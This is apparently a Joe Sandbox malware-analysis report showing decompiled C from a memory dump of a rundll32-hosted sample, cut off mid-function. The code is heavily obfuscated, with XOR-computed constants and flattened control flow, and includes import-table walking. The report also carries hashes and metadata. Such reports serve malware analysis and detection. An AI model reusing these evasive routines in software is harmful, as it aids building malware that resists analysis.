				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _t161;
				char* _t162;
				intOrPtr _t164;
				void* _t168;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				short* _t195;
				signed int* _t197;

				_t197 =  &_v584;
				_v528 = _v528 & 0x00000000;
				_v524 = _v524 & 0x00000000;
				_t168 = 0xe71c2f1;
				_v532 = 0xa0346f;
				_v560 = 0x45ed96;
				_t187 = 0x29;
				_v560 = _v560 / _t187;
				_t189 = 0x5d;
				_v560 = _v560 * 0x5e;
				_v560 = _v560 ^ 0x00ac5e2c;
				_v568 = 0x587b3f;
				_v568 = _v568 >> 1;
				_v568 = _v568 >> 6;
				_v568 = _v568 + 0x3200;
				_v568 = _v568 ^ 0x000d20ef;
				_v540 = 0x1767bf;
				_v540 = _v540 >> 0xa;
				_v540 = _v540 ^ 0x00010300;
				_v548 = 0xad8e3d;
				_v548 = _v548 ^ 0x5762e507;
				_v548 = _v548 ^ 0xbd28358e;
				_v548 = _v548 ^ 0xeae8e106;
				_v584 = 0xa1a61c;
				_v584 = _v584 * 0x38;
				_v584 = _v584 + 0xffff1963;
				_v584 = _v584 | 0xaacebf86;
				_v584 = _v584 ^ 0xabd4b38c;
				_v556 = 0xa4c35b;
				_v556 = _v556 / _t189;
				_v556 = _v556 | 0xf6aeb391;
				_v556 = _v556 ^ 0xf6ac7ee7;
				_v536 = 0xf31b8a;
				_v536 = _v536 | 0x87603e20;
				_v536 = _v536 ^ 0x87f7aca9;
				_v576 = 0x423791;
				_v576 = _v576 + 0xffffb580;
				_v576 = _v576 + 0x7a73;
				_v576 = _v576 ^ 0x7a6e2c80;
				_v576 = _v576 ^ 0x7a24ad4c;
				_v544 = 0x7ccdad;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x3e66d3ae;
				_v572 = 0x1eeccc;
				_v572 = _v572 | 0x2c9b1d75;
				_v572 = _v572 << 6;
				_t190 = 0x5b;
				_v572 = _v572 / _t190;
				_v572 = _v572 ^ 0x007e2283;
				_v552 = 0x119b6d;
				_t191 = 0x5a;
				_v552 = _v552 / _t191;
				_v552 = _v552 ^ 0xceecc8a8;
				_v552 = _v552 ^ 0xceebe4d8;
				_v580 = 0x5ef79f;
				_v580 = _v580 / _t187;
				_v580 = _v580 | 0x8cf80c97;
				_t192 = 0x3d;
				_v580 = _v580 / _t192;
				_v580 = _v580 ^ 0x02499ffb;
				do {
					while(_t168 != 0xc65bb2) {
						if(_t168 == 0x63f282e) {
							_t162 = E007BDA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
							_t197 =  &(_t197[4]);
							_t168 = 0xc65bb2;
							continue;
						}
						if(_t168 == 0xb3c9692) {
							_t164 =  *0x7c3e10; // 0x0
							__eflags = _t164 + 0x1c;
							return E007A3BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
						}
						if(_t168 != 0xe71c2f1) {
							goto L15;
						}
						_t168 = 0x63f282e;
					}
					_v564 = 0x8b8c25;
					_v564 = _v564 * 0x78;
					_v564 = _v564 + 0xffff9cfb;
					_v564 = _v564 ^ 0x41694e51;
					_t161 = E007ACB52(_v584,  &_v520, _v556, _v536, _v576);
					_t197 =  &(_t197[3]);
					_t195 =  &_v520 + _t161 * 2;
					while(1) {
						_t162 =  &_v520;
						__eflags = _t195 - _t162;
						if(_t195 <= _t162) {
							break;
						}
						__eflags =  *_t195 - 0x5c;
						if( *_t195 != 0x5c) {
							L10:
							_t195 = _t195 - 2;
							__eflags = _t195;
							continue;
						}
						_t139 =  &_v564;
						 *_t139 = _v564 - 1;
						__eflags =  *_t139;
						if( *_t139 == 0) {
							__eflags = _t195;
							L14:
							_t168 = 0xb3c9692;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t168 - 0x6143c47;
				} while (__eflags != 0);
				return _t162;
			}

0x007aa55f
0x007aa565
0x007aa56c
0x007aa571
0x007aa576
0x007aa57e
0x007aa590
0x007aa595
0x007aa5a0
0x007aa5a3
0x007aa5a7
0x007aa5af
0x007aa5b7
0x007aa5bb
0x007aa5c0
0x007aa5c8
0x007aa5d0
0x007aa5d8
0x007aa5dd
0x007aa5e5
0x007aa5ed
0x007aa5f5
0x007aa5fd
0x007aa605
0x007aa612
0x007aa616
0x007aa61e
0x007aa626
0x007aa62e
0x007aa63e
0x007aa642
0x007aa64a
0x007aa652
0x007aa65a
0x007aa662
0x007aa66a
0x007aa672
0x007aa67a
0x007aa682
0x007aa68a
0x007aa692
0x007aa69a
0x007aa69f
0x007aa6a7
0x007aa6af
0x007aa6b7
0x007aa6c0
0x007aa6c5
0x007aa6c9
0x007aa6d1
0x007aa6df
0x007aa6e4
0x007aa6e8
0x007aa6f0
0x007aa6f8
0x007aa706
0x007aa70a
0x007aa71a
0x007aa726
0x007aa72f
0x007aa73c
0x007aa73c
0x007aa742
0x007aa772
0x007aa777
0x007aa77a
0x00000000
0x007aa77a
0x007aa746
0x007aa7f0
0x007aa7f5
0x00000000
0x007aa80f
0x007aa752
0x00000000
0x00000000
0x007aa758
0x007aa758
0x007aa77e
0x007aa78f
0x007aa793
0x007aa79b
0x007aa7b3
0x007aa7bc
0x007aa7bf
0x007aa7d3
0x007aa7d3
0x007aa7d7
0x007aa7d9
0x00000000
0x00000000
0x007aa7c4
0x007aa7c8
0x007aa7d0
0x007aa7d0
0x007aa7d0
0x00000000
0x007aa7d0
0x007aa7ca
0x007aa7ca
0x007aa7ca
0x007aa7ce
0x007aa7dd
0x007aa7e0
0x007aa7e0
0x00000000
0x007aa7e0
0x00000000
0x007aa7ce
0x00000000
0x007aa7e2
0x007aa7e2
0x007aa7e2
0x00000000

Strings

QNiA, xrefs: 007AA79B
sz, xrefs: 007AA67A

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: QNiA$sz
API String ID: 0-294658094
Opcode ID: 544e5ea515ec0920db9971f29771252461e59763f524c79554a790e3b01aa8a4
Instruction ID: 9cc96492d5eb9040113908c85d01d1d637f8d870df09d36291ac5c17ea002f4b
Opcode Fuzzy Hash: 544e5ea515ec0920db9971f29771252461e59763f524c79554a790e3b01aa8a4
Instruction Fuzzy Hash: 85714171509341ABC398CF26D98581FBBF1FBC4718F844A1DF586A6260D3798A09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 007B0B19 Relevance: 2.6, Strings: 2, Instructions: 144
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E007B0B19(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				void* _t160;
				void* _t164;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				intOrPtr _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				signed int* _t194;

				_t194 =  &_v68;
				_v12 = 0xec215;
				_v8 = 0x867af3;
				_t190 =  *0x7c3208; // 0x0
				_v4 = 0;
				_t164 = __ecx;
				_v64 = 0x2d9572;
				_t191 = _t190 + 0x20c;
				_v64 = _v64 + 0xffff7051;
				_v64 = _v64 ^ 0xb4c09ebb;
				_v64 = _v64 | 0x08f8e0e6;
				_v64 = _v64 ^ 0xbcfdfbfe;
				_v40 = 0xaf9231;
				_v40 = _v40 + 0x3789;
				_v40 = _v40 + 0x1acf;
				_v40 = _v40 ^ 0x00adbfc0;
				_v68 = 0xf5f340;
				_v68 = _v68 ^ 0x3b0075db;
				_v68 = _v68 >> 1;
				_v68 = _v68 + 0xaae2;
				_v68 = _v68 ^ 0x1dff90e5;
				_v24 = 0xe1803e;
				_v24 = _v24 + 0x946c;
				_v24 = _v24 ^ 0x00ebebe2;
				_v44 = 0xcb8087;
				_t166 = 0x7f;
				_v44 = _v44 / _t166;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x00394faa;
				_v32 = 0x6e7c9c;
				_v32 = _v32 << 0xf;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x00f599ec;
				_v36 = 0x8d7ece;
				_v36 = _v36 + 0xd96f;
				_v36 = _v36 + 0x3e8b;
				_v36 = _v36 ^ 0x008d6b01;
				_v60 = 0x740a18;
				_v60 = _v60 + 0x5af6;
				_t167 = 0x2d;
				_v60 = _v60 / _t167;
				_t168 = 0xc;
				_v60 = _v60 / _t168;
				_v60 = _v60 ^ 0x000f4a79;
				_v48 = 0xecd979;
				_v48 = _v48 + 0xffff2496;
				_t169 = 3;
				_v48 = _v48 / _t169;
				_v48 = _v48 ^ 0xbc9c03a4;
				_v48 = _v48 ^ 0xbcdb2390;
				_v52 = 0x17ff93;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0x3109;
				_v52 = _v52 ^ 0x7590f195;
				_v52 = _v52 ^ 0x8a641707;
				_v20 = 0x28811b;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x05ddec85;
				_v56 = 0x23ad29;
				_t170 = 0x5a;
				_v56 = _v56 / _t170;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x06fabbcf;
				_v56 = _v56 ^ 0x06fdb2ad;
				_v28 = 0x8d9789;
				_v28 = _v28 | 0x3813f7c3;
				_v28 = _v28 + 0xa24c;
				_v28 = _v28 ^ 0x38ab2d0e;
				_v16 = 0x83a12;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x41de3db0;
				while(1) {
					_t192 =  *_t191;
					if(_t192 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
						L4:
						 *_t191 =  *_t192;
						_t160 = E007B8519(_v28, _v16, _t192);
					} else {
						_t133 =  &_v40; // 0xebebe2
						_t160 = E007A8DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
						_t194 =  &(_t194[4]);
						if(_t160 != _v64) {
							_t191 = _t192;
						} else {
							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
							E007B9E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
							E007B1E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
							_t194 =  &(_t194[5]);
							goto L4;
						}
					}
				}
				return _t160;
			}

0x007b0b19
0x007b0b1c
0x007b0b26
0x007b0b32
0x007b0b3a
0x007b0b3e
0x007b0b40
0x007b0b48
0x007b0b4e
0x007b0b56
0x007b0b5e
0x007b0b66
0x007b0b6e
0x007b0b76
0x007b0b7e
0x007b0b86
0x007b0b8e
0x007b0b96
0x007b0b9e
0x007b0ba2
0x007b0baa
0x007b0bb2
0x007b0bba
0x007b0bc2
0x007b0bca
0x007b0bd8
0x007b0bdd
0x007b0be3
0x007b0be8
0x007b0bf0
0x007b0bf8
0x007b0bfd
0x007b0c02
0x007b0c0a
0x007b0c12
0x007b0c1a
0x007b0c22
0x007b0c2a
0x007b0c32
0x007b0c3e
0x007b0c43
0x007b0c4d
0x007b0c52
0x007b0c58
0x007b0c60
0x007b0c68
0x007b0c74
0x007b0c77
0x007b0c7b
0x007b0c83
0x007b0c8b
0x007b0c93
0x007b0c98
0x007b0ca0
0x007b0ca8
0x007b0cb0
0x007b0cbd
0x007b0cc1
0x007b0cc9
0x007b0cd9
0x007b0cdc
0x007b0ce0
0x007b0ce5
0x007b0ced
0x007b0cf5
0x007b0cfd
0x007b0d05
0x007b0d0d
0x007b0d15
0x007b0d1d
0x007b0d22
0x007b0d9d
0x007b0d9d
0x007b0da1
0x00000000
0x00000000
0x007b0d2f
0x007b0d8a
0x007b0d95
0x007b0d97
0x007b0d31
0x007b0d41
0x007b0d45
0x007b0d4a
0x007b0d51
0x007b0dab
0x007b0d53
0x007b0d58
0x007b0d6a
0x007b0d82
0x007b0d87
0x00000000
0x007b0d87
0x007b0d51
0x007b0d2f
0x007b0daa

Strings

1, xrefs: 007B0C98
, xrefs: 007B0D41

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1$
API String ID: 0-209397207
Opcode ID: e435ffd5b720b5766c0089bea9cd9bbbe6e9ef11dbecb33af29d86cd2c64b067
Instruction ID: 8668b2d683199c252ca860ad3cb9ea3628b987819a0ffbcf81ce0d8047917551
Opcode Fuzzy Hash: e435ffd5b720b5766c0089bea9cd9bbbe6e9ef11dbecb33af29d86cd2c64b067
Instruction Fuzzy Hash: 93612EB25083419FC394CF21D48940BBBF1FBC9768F509A1DF19696260D7B5DA4A8F82

Uniqueness

Uniqueness Score: -1.00%

Function 007AAEFB Relevance: 2.6, Strings: 2, Instructions: 141
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E007AAEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t116;
				void* _t130;
				intOrPtr _t133;
				void* _t137;
				intOrPtr* _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				void* _t162;

				_t135 = _a12;
				_push(_a16);
				_t154 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t116);
				_v44 = 0xe8605f;
				_t162 = _t161 + 0x18;
				_v44 = _v44 + 0x84a0;
				_v44 = _v44 ^ 0x00e8e4ff;
				_t155 = 0;
				_v68 = 0xe00e28;
				_t137 = 0xc99b7e9;
				_v68 = _v68 << 9;
				_v68 = _v68 << 2;
				_t156 = 0x3b;
				_v68 = _v68 / _t156;
				_v68 = _v68 ^ 0x0001eb63;
				_v76 = 0x5a4023;
				_v76 = _v76 >> 0xf;
				_t157 = 0x5b;
				_v76 = _v76 * 0x13;
				_v76 = _v76 ^ 0x64c481b8;
				_v76 = _v76 ^ 0x64ccd277;
				_v64 = 0xe36df4;
				_v64 = _v64 / _t157;
				_t158 = 9;
				_v64 = _v64 * 0x52;
				_v64 = _v64 ^ 0x00c8b522;
				_v80 = 0x952e3b;
				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0xc023484e;
				_v80 = _v80 / _t158;
				_v80 = _v80 ^ 0x155df6ec;
				_v72 = 0x4bfcfc;
				_v72 = _v72 | 0x0a339af0;
				_v72 = _v72 << 0xf;
				_t159 = 0x12;
				_v72 = _v72 / _t159;
				_v72 = _v72 ^ 0x0e3e5ce5;
				_v40 = 0xc0630c;
				_v40 = _v40 | 0x5d0d844d;
				_v40 = _v40 ^ 0x5dc4e99c;
				_v52 = 0x98b7b;
				_v52 = _v52 + 0xa105;
				_v52 = _v52 >> 5;
				_v52 = _v52 ^ 0x0004c78d;
				_v56 = 0xd0814a;
				_v56 = _v56 >> 9;
				_v56 = _v56 * 0x3e;
				_v56 = _v56 ^ 0x001a31dc;
				_v60 = 0xb9e1cb;
				_v60 = _v60 * 0x25;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x768204a8;
				_v48 = 0xccd34a;
				_v48 = _v48 + 0xffff20ce;
				_v48 = _v48 ^ 0x00ce4dff;
				do {
					while(_t137 != 0x8f26e2d) {
						if(_t137 == 0xc99b7e9) {
							_t137 = 0x8f26e2d;
							continue;
						} else {
							if(_t137 != 0xfe1ef29) {
								goto L10;
							} else {
								_t133 =  *0x7c3dfc; // 0x0
								E007BE274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
								_t155 =  ==  ? 1 : _t155;
							}
						}
						L5:
						return _t155;
					}
					_push( *_t154);
					_t130 = E007BAE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
					_t162 = _t162 + 0x14;
					if(_t130 == 0) {
						_t137 = 0xeaa5f76;
						goto L10;
					} else {
						_t137 = 0xfe1ef29;
						continue;
					}
					goto L5;
					L10:
				} while (_t137 != 0xeaa5f76);
				goto L5;
			}

0x007aaeff
0x007aaf06
0x007aaf0a
0x007aaf0c
0x007aaf0d
0x007aaf11
0x007aaf15
0x007aaf16
0x007aaf17
0x007aaf1c
0x007aaf24
0x007aaf27
0x007aaf31
0x007aaf39
0x007aaf3b
0x007aaf43
0x007aaf48
0x007aaf4d
0x007aaf58
0x007aaf5d
0x007aaf63
0x007aaf6b
0x007aaf73
0x007aaf7d
0x007aaf80
0x007aaf84
0x007aaf8c
0x007aaf94
0x007aafa4
0x007aafad
0x007aafb0
0x007aafb4
0x007aafbc
0x007aafc4
0x007aafc9
0x007aafd9
0x007aafdd
0x007aafe5
0x007aafed
0x007aaff5
0x007aaffe
0x007ab001
0x007ab005
0x007ab00d
0x007ab015
0x007ab01d
0x007ab025
0x007ab02d
0x007ab035
0x007ab03a
0x007ab042
0x007ab04a
0x007ab054
0x007ab058
0x007ab060
0x007ab06d
0x007ab071
0x007ab076
0x007ab083
0x007ab08b
0x007ab093
0x007ab09b
0x007ab09b
0x007ab0a5
0x007ab101
0x00000000
0x007ab0a7
0x007ab0ad
0x00000000
0x007ab0b3
0x007ab0bc
0x007ab0e3
0x007ab0f4
0x007ab0f4
0x007ab0ad
0x007ab0f8
0x007ab100
0x007ab100
0x007ab105
0x007ab11b
0x007ab120
0x007ab125
0x007ab131
0x00000000
0x007ab127
0x007ab127
0x00000000
0x007ab127
0x00000000
0x007ab136
0x007ab136
0x00000000

Strings

#@Z, xrefs: 007AAF6B
_`, xrefs: 007AAF1C

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #@Z$_`
API String ID: 0-2586238014
Opcode ID: 2d0322ee28b059a0790028be191923c771ccc80d4150a00bf4137fbed0354ea3
Instruction ID: ef05361e47a0f1c099722a8534d398d6c655d5eb4ee8d4475a5810d3284d35bd
Opcode Fuzzy Hash: 2d0322ee28b059a0790028be191923c771ccc80d4150a00bf4137fbed0354ea3
Instruction Fuzzy Hash: DC5123721083009FC758CF22C88A82BBBE1FBD8758F549A1DF59696261C376CA49CF46

Uniqueness

Uniqueness Score: -1.00%

Function 007ADFF3 Relevance: 2.6, Strings: 2, Instructions: 135
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E007ADFF3() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _t128;
				intOrPtr _t131;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t143;
				void* _t146;
				signed int* _t148;

				_t148 =  &_v52;
				_v12 = 0xa1a716;
				_v12 = _v12 + 0x2188;
				_v12 = _v12 ^ 0x00a02056;
				_v32 = 0x472a3;
				_v32 = _v32 + 0x22e5;
				_v32 = _v32 ^ 0xff9fab52;
				_v32 = _v32 ^ 0xff9c5b0a;
				_v48 = 0x9a7516;
				_v48 = _v48 + 0xffff4702;
				_v48 = _v48 * 0x45;
				_v48 = _v48 + 0xffff2ff5;
				_t146 = 0x4903f33;
				_v48 = _v48 ^ 0x296ff1ed;
				_v16 = 0xfa3b71;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0xf47f6bba;
				_v20 = 0xc0b9b;
				_t133 = 0x7b;
				_v20 = _v20 * 0x52;
				_v20 = _v20 ^ 0x03d2ca7d;
				_v36 = 0x400b3e;
				_v36 = _v36 ^ 0xba288636;
				_v36 = _v36 ^ 0xc4c376ba;
				_v36 = _v36 ^ 0x7eaacb92;
				_v52 = 0x3419b2;
				_v52 = _v52 / _t133;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 | 0xcef26f8a;
				_v52 = _v52 ^ 0xcef1d6cf;
				_v4 = 0xb26f64;
				_t134 = 3;
				_v4 = _v4 / _t134;
				_v4 = _v4 ^ 0x003ff5cc;
				_v40 = 0x34a33d;
				_v40 = _v40 >> 4;
				_v40 = _v40 ^ 0xd21b54bd;
				_v40 = _v40 ^ 0x33ae4ce0;
				_v40 = _v40 ^ 0xe1b00bb7;
				_v8 = 0x4c76b4;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x013e4034;
				_v24 = 0x1c9e42;
				_v24 = _v24 ^ 0x4f10b4b5;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0xf0cd9088;
				_v44 = 0xfe69b1;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 * 0x49;
				_v44 = _v44 * 0x7d;
				_v44 = _v44 ^ 0x011db47c;
				_v28 = 0x46ec28;
				_v28 = _v28 << 9;
				_v28 = _v28 * 0x58;
				_v28 = _v28 ^ 0xc2551a85;
				_t135 =  *0x7c3e0c; // 0x0
				do {
					while(_t146 != 0x4903f33) {
						if(_t146 == 0x6f617aa) {
							_t128 = E007A46BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E007A81B7, _v28);
							_t135 =  *0x7c3e0c; // 0x0
							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
						} else {
							if(_t146 != 0xc69f0b3) {
								goto L6;
							} else {
								_t131 = E007A7AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
								_t135 =  *0x7c3e0c; // 0x0
								_t148 =  &(_t148[6]);
								_t146 = 0x6f617aa;
								 *((intOrPtr*)(_t135 + 8)) = _t131;
								continue;
							}
						}
						L9:
						return 0 | _t135 != 0x00000000;
					}
					_push(_t135);
					_push(_t135);
					_t143 = 0x24;
					_t135 = E007A7FF2(_t143);
					_t146 = 0xc69f0b3;
					 *0x7c3e0c = _t135;
					L6:
				} while (_t146 != 0xab42793);
				goto L9;
			}

0x007adff3
0x007adff6
0x007ae000
0x007ae008
0x007ae010
0x007ae018
0x007ae020
0x007ae028
0x007ae030
0x007ae038
0x007ae049
0x007ae052
0x007ae05a
0x007ae05c
0x007ae069
0x007ae076
0x007ae07b
0x007ae083
0x007ae092
0x007ae095
0x007ae099
0x007ae0a1
0x007ae0a9
0x007ae0b1
0x007ae0b9
0x007ae0c1
0x007ae0d1
0x007ae0d5
0x007ae0da
0x007ae0e2
0x007ae0ea
0x007ae0f6
0x007ae0f9
0x007ae0fd
0x007ae105
0x007ae10d
0x007ae112
0x007ae11a
0x007ae122
0x007ae12a
0x007ae132
0x007ae137
0x007ae13f
0x007ae147
0x007ae14f
0x007ae154
0x007ae15c
0x007ae164
0x007ae16e
0x007ae177
0x007ae17b
0x007ae183
0x007ae18b
0x007ae195
0x007ae199
0x007ae1a1
0x007ae1a7
0x007ae1a7
0x007ae1ad
0x007ae229
0x007ae22e
0x007ae237
0x007ae1af
0x007ae1b1
0x00000000
0x007ae1b3
0x007ae1c6
0x007ae1cb
0x007ae1d1
0x007ae1d4
0x007ae1d6
0x00000000
0x007ae1d6
0x007ae1b1
0x007ae23b
0x007ae248
0x007ae248
0x007ae1e7
0x007ae1e8
0x007ae1eb
0x007ae1f3
0x007ae1f5
0x007ae1f7
0x007ae1fd
0x007ae1fd
0x00000000

Strings

(F, xrefs: 007AE183
", xrefs: 007AE018

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (F$"
API String ID: 0-1034852068
Opcode ID: 6b30ab1938ad8b0677334a6d83dcceb7d8c6ab1a111c29627076d127d3cb5989
Instruction ID: e68047b7a9d56a59796230a66de2cd1aabce96e233efe9e899714d77b5b2bb7d
Opcode Fuzzy Hash: 6b30ab1938ad8b0677334a6d83dcceb7d8c6ab1a111c29627076d127d3cb5989
Instruction Fuzzy Hash: 335133714093019FC358CF25D98A80FBBE1EBD5758F108A1DF595AA260D3B5DA09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 007A7C37 Relevance: 2.6, Strings: 2, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E007A7C37(void* __ecx, void* __edx) {
				void* _t91;
				void* _t102;
				signed short _t108;
				signed short _t111;
				signed short _t113;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed short _t121;
				intOrPtr _t128;
				signed short* _t132;
				signed short _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t136;

				_t134 =  *((intOrPtr*)(_t135 + 0x30));
				_push(_t134);
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t91);
				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
				_t136 = _t135 + 0x14;
				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
				_t115 = 0x47;
				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
				 *(_t136 + 0x28) = 0x411077;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
				 *(_t136 + 0x14) = 0x6ab109;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
				 *(_t136 + 0x3c) = 0x583f0;
				_t116 = 0x13;
				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
				 *(_t136 + 0x28) = 0xeb6063;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
				 *(_t136 + 0x20) = 0x8f08a1;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
				 *(_t136 + 0x1c) = 0x46d0e7;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
				 *(_t136 + 0x14) = 0x9e0f5b;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
				_t117 =  *(_t136 + 0x18);
				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t133 = _t128 + _t134;
					while(1) {
						_t105 =  *((intOrPtr*)(_t133 + 0xc));
						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
							goto L13;
						}
						_t121 = E007BCADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
						 *(_t136 + 0x18) = _t121;
						__eflags = _t121;
						if(_t121 == 0) {
							L15:
							return 0;
						}
						_t132 =  *_t133 + _t134;
						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
						while(1) {
							_t108 =  *_t132;
							__eflags = _t108;
							if(__eflags == 0) {
